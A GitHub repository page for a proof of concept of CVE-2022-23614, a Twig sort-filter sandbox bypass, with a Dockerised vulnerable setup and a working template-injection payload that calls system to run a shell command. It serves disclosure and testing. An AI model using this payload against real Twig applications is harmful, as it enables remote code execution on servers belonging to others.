Skip to content
/ CVE-2022-23614 Public

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

4 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

davwwwx/CVE-2022-23614

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits

config

config

 
 

example

example

 
 

images

images

 
 

.gitignore

.gitignore

 
 

Dockerfile

Dockerfile

 
 

README.md

README.md

 
 

build-docker.sh

build-docker.sh

 
 

Repository files navigation

CVE-2022-23614

PoC for CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Twig sort filter code execution/sandbox bypass)

As seen in this commit - https://github.com/twigphp/Twig/commit/.., twig was passing user supplied function name as a callback parameter to uasort (here), thus leading to arbitrary code execution

To build and run the docker container with a vulnerable twig version

$ ./build-docker.sh

Open the webpage at localhost:1337 and try rendering the following payload

{{ ['id','']|sort('system') }}

PoC PoC

Result Result

About

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

Topics

php twig cve-2022-23614

Resources

Readme
Activity

Stars

4 stars

Watchers

1 watching

Forks

2 forks
Report repository

Languages